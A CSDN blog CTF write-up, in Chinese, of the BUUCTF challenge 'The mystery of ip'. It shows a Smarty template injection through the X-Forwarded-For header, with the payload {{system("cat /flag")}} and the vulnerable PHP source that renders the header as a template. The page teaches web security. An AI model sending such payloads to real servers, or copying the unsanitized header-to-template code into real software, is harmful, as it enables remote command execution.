【BUUCTF】[BJDCTF2020]The mystery of ip

最新推荐文章于 2024-04-25 14:07:47 发布
最新推荐文章于 2024-04-25 14:07:47 发布
阅读量363 收藏 1
点赞数
分类专栏: 模板注入 HTTP php 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aoao331198/article/details/124363889
版权
php 同时被 3 个专栏收录
22 篇文章 2 订阅
订阅专栏
模板注入
4 篇文章 0 订阅
订阅专栏
HTTP
2 篇文章 0 订阅
订阅专栏

X-Forwarded-For
看到题目,要首先想到这个
BP在http头里面增加X-Forwarded-For,发现是可控的,可能存在模板注入
在这里插入图片描述
让X-Forwarded-For={{7*7}}
在这里插入图片描述
接下来常规思路注入命令

X-Forwarded-For={{system("cat /flag")}}

过程没什么好说的,贴一下源码

<?php
    	require_once('header.php');
		require_once('./libs/Smarty.class.php');
		$smarty = new Smarty();
		if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
		{
		    $ip=$_SERVER['HTTP_CLIENT_IP'];
		}
		elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
		{
		    $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
		}
		else
		{
		    $ip=$_SERVER['REMOTE_ADDR'];
		}
		//$your_ip = $smarty->display("string:".$ip);
		echo "<div class=\"container panel1\">
					<div class=\"row\">
					<div class=\"col-md-4\">	
					</div>
					<div class=\"col-md-4\">
					<div class=\"jumbotron pan\">
						<div class=\"form-group log\">
							<label><h2>Your IP is : ";
		$smarty->display("string:".$ip);
		echo "				</h2></label>
						</div>		
					</div>
					</div>
					<div class=\"col-md-4\">	
					</div>
					</div>
				</div>";
	?>

注意到

$smarty->display("string:".$ip);

特地去了解一下吧,感觉挺少见的
PHP的模板注入(SMARTY模板)

aoao今晚吃什么
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
The Mystery of Legend-开源
06-28
一个关于传奇之谜的游戏,艾伦需要点燃它。 JRPG风格的游戏。
The Mystery
06-23
The Mystery Method_cn.rar
[BJDCTF2020]The mystery of ip
qq_53689523的博客
03-18 270
总结:本题是一道X-Forwarded-For题目,服务器端获取客户端的ip通过X-Forwarded-For,通过其传递参数可能会被服务器端执行。5.Brup抓包,添加X-Forwarded-For字段,看输出是否有变化。服务器端获取客户端的ip,一般是通过X-Forwarded-For。提示:你知道我是怎么获得你的ip的吗?2.点击hint,获得提示。3.右键,检查页面源代码。
web:[BJDCTF2020]The mystery of ip(ssti模板注入、Smarty 模板引擎)
sleepywin的博客
12-30 533
这里尝试抓包加上X-Forwarded-For请求头修改为127.0.0.1。尝试了{{config}}报错,报错信息显示smarty模板引擎。输入{{2*2}},回显4,确定为ssti注入。直接cat发现有两个flag,真的在根目录下。这里发现输入什么就回显什么,存在ip伪造。在hint.php的源代码页面中发现。了解一下smarty模板引擎。由题目可以知道要从ip入手。点击flag页面得到ip
BUUCTF——[BJDCTF2020]The mystery of ip
最新发布
m_de_g的博客
04-25 328
思路真的很重要,没有这个XFF注入的话,我根本解决不了这道题目,还去.Ds_store里面绕半天,一直在错误里老半天,自己又很累,又解决不出来问题。
[BJDCTF2020]The mystery of ip1
whale_waves的博客
11-23 1212
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。漏洞触发的原因未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。
buuctf-[BJDCTF2020]The mystery of ip(小宇特详解)
小宇的web博客
02-10 2193
buuctf-[BJDCTF2020]The mystery of ip(小宇特详解) 1.先看题目 这里找不到线索就抓包找 依次找flag.php,hint.php,index.php. 2.这里重新抓包flag.php进行分析 这里在重发器中加入client-ip:66尝试修改ip 这里会发现能够修改flag中的ip 这里想到命令执行 尝试系统命令client-ip:{system(‘ls’)}发现可以,然后尝试client-ip:{system(‘cat/flag’)} ...
smarty模版 [BJDCTF2020]The mystery of ip 1
m0_75178803的博客
12-06 596
本来联想到XFF漏洞引起的sql注入,但是我们无论输入什么都会正常回显,就联想到ssti注入。我们看到smarty_internal_templatecompilerbase.php。可以看到用的是smarty,Smarty 是一个用于 PHP 的模板引擎。点击hint,查看源代码处告诉了我们要利用这个ip。bp抓包,并添加X-Forward-For头。点击flag给了我们一个ip。{config}来看看配置。
Mystery of Mobile Data Collecting AND Processing》PDF版本下载.txt
07-17
Mystery of Mobile Data Collecting AND Processing》PDF版本下载
The Art of Linux Kernel Design
09-15
It removes the mystery, revealing operating system design guidelines, explaining the BIOS code directly related to the operating system, and simplifying the relationships and guiding ideology behind ...
【精品】备考2011高效学习方案英语高三册:Units 13~14  The mystery of the Moonstone & Zoology.doc
08-19
【精品】备考2011高效学习方案英语高三册:Units 13~14 The mystery of the Moonstone & Zoology.doc
BUUCTF:[BJDCTF2020]The mystery of ip
末初的CSDN博客
04-18 896
https://buuoj.cn/challenges#[BJDCTF2020]The%20mystery%20of%20ip 回显了IP,在hint.php有提示Do you know why i know your ip? 尝试修改X-Forwarded-For 猜测这里可能是SSTI,输入{{7*7}} 确定了是SSTI,尝试{{config}} 看报错发现这里应该是PHP的一种比较老的引擎Smarty 查看版本 {$smarty.version} 版本是:3.1.34-dev-7 查
【学习笔记 37】 buu [BJDCTF2020]The mystery of ip
weixin_43553654的博客
08-01 366
0x00 知识点 tplmap探测是否存在模板注入漏洞 smartly模板注入 0x01 知识点详解 tplmap的使用方法? 答:这里只用到python tplmap.py -u 'curl',想了解详情的话这里附上一篇大佬的博客。 什么是smartly模板引擎注入? 答:这里参考这篇文章 解题思路 打开网站一看 就看到了他提示的flag,那还不点开看看 提示到了我的IP,这一瞬间就让我想到了http的请求头里的XXF参数和Client-ip参数,想了解http请求头详情的请去看我的上一篇文
[bjdctf2020]the mystery of ip
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值